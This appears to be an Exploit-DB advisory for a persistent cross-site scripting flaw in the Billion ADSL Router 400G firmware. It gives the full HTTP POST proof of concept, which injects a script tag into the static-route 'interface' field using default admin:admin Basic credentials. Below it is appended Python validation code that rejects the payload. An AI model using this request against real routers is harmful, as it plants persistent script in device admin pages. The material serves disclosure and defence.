EDB-ID-45515

TVT618 Oct 5th, 2018
# Exploit Title: Billion ADSL Router 400G 20151105641 - Cross-Site Scripting
# Author: Cakes
# Discovery Date: 2018-09-30
# Vendor Homepage: http://www.billion.com
# Software Link: http://billionfirmware.co.za
# Tested Version: 20151105641
# Tested on OS: Kali Linux
# CVE: N/A

# Description:
# Improper input validation in the router web interface allows attackers to add a persistent
# Cross-Site Scripting payload in the IP Interface field when adding a new static route.
# Simply intercept a new static route request and add in the XSS.

# PoC

POST /configuration/edit-list.html HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://Target/configuration/edit-list.html
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

nodename=&destination=0.0.0.0&netmask=0.0.0.0&gateway=0.0.0.1&interface=<script>alert("Cakes");</script>&cost=1&action=create
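A defensive counterpart to the request above, added here and not part of the advisory or the vendor's firmware: server-side validation of the static-route form fields (the `interface` value must come from an allowlist rather than free text; the interface names, field limits and route-table layout are assumptions) plus HTML-escaping of stored values on output, so the PoC body is rejected and, even if it were stored, would render as text rather than script.

```python
import html
import ipaddress
from urllib.parse import parse_qs

# Assumed allowlist of interface names; the real router's names are not on the page.
ALLOWED_INTERFACES = {"br0", "pppoe_0_8_35", "ipoe_0_8_35"}


def validate_static_route(body: str) -> dict:
    """Parse a form-urlencoded static-route body; raise ValueError on any bad field."""
    raw = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    clean = {}
    for name in ("destination", "netmask", "gateway"):
        try:
            clean[name] = str(ipaddress.IPv4Address(raw.get(name, "")))
        except ValueError:
            raise ValueError(f"{name}: not an IPv4 address") from None
    # The field the PoC abuses: a choice from a fixed set, never free text.
    if raw.get("interface") not in ALLOWED_INTERFACES:
        raise ValueError("interface: not a known interface name")
    clean["interface"] = raw["interface"]
    # Free-text label: length-capped here (assumed limit), escaped again on output.
    clean["nodename"] = raw.get("nodename", "")[:32]
    cost = raw.get("cost", "")
    if not cost.isdigit() or not 1 <= int(cost) <= 255:
        raise ValueError("cost: must be an integer 1..255")
    clean["cost"] = int(cost)
    if raw.get("action") != "create":
        raise ValueError("action: unsupported")
    clean["action"] = "create"
    return clean


def render_route_row(route: dict) -> str:
    """Second layer: HTML-escape every stored value when building the routes table."""
    cells = "".join(f"<td>{html.escape(str(v))}</td>" for v in route.values())
    return f"<tr>{cells}</tr>"


def is_rejected(body: str) -> bool:
    """True when validate_static_route refuses the request body."""
    try:
        validate_static_route(body)
    except ValueError:
        return True
    return False


# Constructed inputs: the advisory's PoC body and a benign route using an allowed interface.
POC_BODY = 'nodename=&destination=0.0.0.0&netmask=0.0.0.0&gateway=0.0.0.1&interface=<script>alert("Cakes");</script>&cost=1&action=create'
GOOD_BODY = "nodename=lan&destination=0.0.0.0&netmask=0.0.0.0&gateway=0.0.0.1&interface=br0&cost=1&action=create"
```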